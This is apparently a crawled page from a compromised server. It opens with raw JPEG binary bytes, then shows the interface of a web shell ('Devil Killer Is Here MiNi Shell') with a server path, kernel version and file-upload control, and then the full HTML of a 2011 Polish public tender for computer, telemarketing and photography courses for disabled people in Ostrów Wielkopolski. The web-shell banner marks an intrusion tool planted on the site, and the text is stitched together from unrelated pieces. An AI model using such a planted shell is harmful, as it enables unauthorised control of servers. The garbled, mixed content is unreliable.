JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111011/330136-N-2011.html

<p class="kh_header"><b>Ostrów Wielkopolski: Postępowanie o udzielenie zamówienia publicznego na zorganizowanie                                 i przeprowadzenie kursów:
obsługi komputera i projektowania stron internetowych,
telemarketingu,
fotograficzny</b><br>
<b>Numer ogłoszenia: 330136 - 2011; data zamieszczenia: 11.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Juliusza Słowackiego 1C, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 0 62 735 51 52, faks 0 62 735 02 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiat-ostrowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na zorganizowanie                                 i przeprowadzenie kursów:
obsługi komputera i projektowania stron internetowych,
telemarketingu,
fotograficzny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - kurs obsługi komputera i projektowania stron internetowych

A) Wykonawca zorganizuje i przeprowadzi kurs obsługi komputera dla zaawansowanych z programami biurowymi i graficznymi dla 12 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA - w tym 9 kobiet, w wieku od 31 do 58 lat, w jednej grupie - 30 h
w terminie:
od dnia 14 listopada 2011 roku do 18 listopada 2011 roku, 
Razem 5 dni po 6 godzin - od 8.00 do 14.00

Wykonawca:

- zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych w mieście Ostrów Wielkopolski,
- podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka,  jeden ciepły posiłek),  
- przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków                i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
- w programie kursu w ramach programów biurowych może uwzględnić program Word, Excel, Access i Front Page,
- w programie kursu w ramach programów graficznych może uwzględnić Adobe Photoshop, Corel Draw, Power Point.
- zobowiązuje się prowadzić listę obecności uczestników ww. kursów (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
- zobowiązuje się wydać uczestnikom ww. kursów dokument, potwierdzający udział 
w  kursie wraz z zakresem programowym i godzinowym.
- dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
- miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
- zabezpieczy bazę dydaktyczną.
- zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
- zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe                            i uprawnienia.
- w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
-  oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,
- zdjęcia dokumentujące realizację kursu.

Zamawiający:
- w losowych przypadkach uniemożliwiających realizację ww. kursów w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu.

B)  Wykonawca zorganizuje i przeprowadzi kursu podstawowy obsługi komputera dla 10 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA, w tym 2 kobiet,  w wieku 50+, w tym jedna osoba poruszająca się na wózku elektrycznym, w jednej grupie - 60 h  
w terminie:

- od dnia 07 listopada 2011 roku do 10 listopada 2011 roku, 
- od dnia 14 listopada 2011 roku do dnia 18 listopada 2011 roku.
        Razem 9 dni, w tym: 6 dni po 7 godzin - od 8.00 do 15.00 oraz 3 dni po 6 godzin - od 8.00 do  14.00.

Wykonawca:

- zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych w mieście Ostrów Wielkopolski,
- zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe 
i uprawnienia,
- podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),
- przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków              i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
- w programie kursu uwzględni:
1.	Uruchomienie komputera i kończenie pracy na nim, posługiwanie się myszką.
2.	Pulpit w Windows, co można na nim znaleźć i do czego służy.
3.	Uruchamianie i praca z podstawowymi programami.
4.	Przykładowy prosty program do tworzenia rysunków.
5.	Przetwarzanie tekstu.
6.	Internet; obsługa stron internetowych, wyszukiwanie informacji, obsługa poczty elektronicznej.
- zobowiązuje się prowadzić listę obecności uczestników ww. kursów (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
- zobowiązuje się wydać uczestnikom ww. kursów dokument, potwierdzający udział 
w  kursie wraz z zakresem programowym i godzinowym.
- dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
- zabezpieczy bazę dydaktyczną.
- miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
- zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
- w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,
- zdjęcia dokumentujące realizację kursu.
Zamawiający:
- w losowych przypadkach uniemożliwiających realizację ww. kursów w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursów.


C)	Wykonawca zorganizuje i przeprowadzi kurs projektowania stron internetowych dla 10 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA, w tym      2 kobiet, w wieku 50+, w tym jedna osoba poruszająca się na wózku elektrycznym,                     w jednej grupie - 30 h
w terminie: 
- od dnia 12 grudnia 2011 roku do dnia 16 grudnia 2011 roku, 
Razem 5 dni, po 6 godzin - od 08.00 do 14.00.

Wykonawca:
- zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych w mieście Ostrów Wielkopolski,
- zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe 
i uprawnienia,
- podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),  
- przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków 
i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
- w programie kursu uwzględni:
1.	Podstawy tworzenia stron internetowych w języku HTML, w wymiarze 4 godzin.
2.	Najważniejsze komendy języka HTML, w wymiarze 6 godzin.
3.	Teoretyczne podstawy projektowania graficznego, w wymiarze 7 godzin.
4.	Korzystanie z bezpłatnego edytora stron internetowych KED, w wymiarze 4 godzin.
5.	Umieszczanie grafiki w tekście, w wymiarze 4 godzin.
6.	 Przenośność strony internetowej, w wymiarze 2 godzin.
7.	Publikacja własnej strony na serwerze i zasady polityki prywatności, w wymiarze 3 godzin.
- zobowiązuje się prowadzić listę obecności uczestników ww. kursów (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
- zobowiązuje się wydać uczestnikom ww. kursów dokument, potwierdzający udział 
w  kursie wraz z zakresem programowym i godzinowym.
- dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
- zabezpieczy bazę dydaktyczną.
- miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
- zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
- w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,
- zdjęcia dokumentujące realizację kursu.

Zamawiający:
- zapewni tłumacza języka migowego podczas zajęć dla grupy 5 osób niesłyszących uczestniczek i uczestników projektu,
- w losowych przypadkach uniemożliwiających realizację ww. kursów w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu.

Część II - kurs telemarketingu
Wykonawca zorganizuje i przeprowadzi kurs telemarketingu I stopnia dla 10 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA, w tym 2 kobiet, w wieku 50+, w tym jedna osoba poruszającą się na wózku elektrycznym, w jednej grupie -  30 h
w terminie:

 - w dniach 08, 09, 19, 20, 21 grudnia 2011 roku 
 Razem 5 dni po 6 godzin - od 08.00 do 14.00.


Wykonawca:

- zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych,                w mieście Ostrów Wielkopolski,
- zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe                             i uprawnienia,
- podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),   
- przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków 
i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
- w programie kursu uwzględni:
1.	Telemarketing we współczesnej gospodarce. 
2.	Przygotowanie do rozmowy telefonicznej.
3.	Budowa i formułowanie przekazu.
4.	Sprzedaż przez telefon.
5.	Co poza mówieniem?
6.	Techniki sprzedaży i negocjacji wykorzystywane w telemarketingu.
7.	przez telefon.Windykacja należności 
8.	Praca na własny rachunek czy najemna.
9.	Mierzenie efektywności działań telemarketingowych.
- zobowiązuje się prowadzić listę obecności uczestników kursu  (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
- zobowiązuje się wydać uczestnikom ww. kursu dokument, potwierdzający udział w  kursie wraz 
z zakresem programowym i godzinowym.
- dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
- Wykonawca zabezpieczy bazę dydaktyczną.
- miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
- Wykonawca zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
- Wykonawca w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,

Zamawiający: 
- w losowych przypadkach uniemożliwiających realizację ww. kursu w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu.


Część III - kurs fotograficzny
Wykonawca zorganizuje przeprowadzi kurs fotograficzny dla 9 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA - w tym 6 kobiet,  w wieku od 18 do 28 lat, w dwóch grupach - 30 h, w tym jedna osoba na wózku inwalidzkim 
w terminie:

I grupa  - 04 i 05, 07 i 08, 14 listopada 2011 r. - w tym jedna osoba na wózku inwalidzkim
 Razem 5 dni po 6 godzin - od 08.00 do 14.00. (04 listopada 2011 r. od godz. 13.00 do 19.00)

II grupa  - 07 i 08, 14 - 16 listopada 2011 r.

Razem 5 dni po 6 godzin - od 08.00 do 14.00.

Wykonawca:

- zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych 
w mieście Ostrów Wielkopolski,
- zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe                             i uprawnienia,
- podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),  
- przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków                         i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
- w programie kursu uwzględni:
1.	Krótka historia fotografii. Jak powstaje zdjęcie? Zdefiniowanie podstawowych pojęć.
2.	Technika i technologia w fotografii (fotografia analogowa a fotografia cyfrowa).
3.	Zdjęcie - obraz malowany światłem: zdjęcie z głębią i zdjęcie (płaskie), zdjęcie dynamiczne 
i ruch w fotografii, klasyczne proporcje i współczesne kadrowanie.
4.	Klasyczne tematy fotografii (pejzaż, portret, martwa natura, makrofotografia).
5.	Czym zrobić zdjęcie - rodzaje aparatów.
6.	Sztuka ekspozycji:
- czym jest ekspozycja,
- podstawowa kontrola ekspozycji: czułość ISO, czas i przysłona obiektywu.
7.  Głębia ostrości: kiedy istotna, kiedy przeszkadza.
8.  Światło: naturalne i sztuczne, kierunek padania i pora dnia - wpływ na fotografię.
9.  Obróbka zdjęć. Techniki komputerowe w fotografii. Sprzęt. Oprogramowanie.

- zobowiązuje się prowadzić listę obecności uczestników kursu (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
- zobowiązuje się wydać uczestnikom ww. kursu dokument, potwierdzający udział w kursie wraz 
z zakresem programowym i godzinowym.
- dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
- zabezpieczy bazę dydaktyczną.
- miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
- zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
- w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,

Zamawiający: 
- w losowych przypadkach uniemożliwiających realizację ww. kursu w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dopuszcza się przesunięcie terminu realizacji kursów - w losowych przypadkach uniemożliwiających realizację zajęć w zakładanym terminie,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiat-ostrowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie 63-400 Ostrów Wielkopolski, Al. Słowackiego 1c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2011 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie 63-400 Ostrów Wielkopolski, Al. Słowackiego 1c, sekretariat - pok. nr 13 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie jest realizowane w ramach projektu: TWOJA SZANSA w ramach Programu Operacyjnego Kapitał Ludzki, priorytet VII Promocja Integracji Społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, poddziałanie 7.1.2. Rozwój               i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
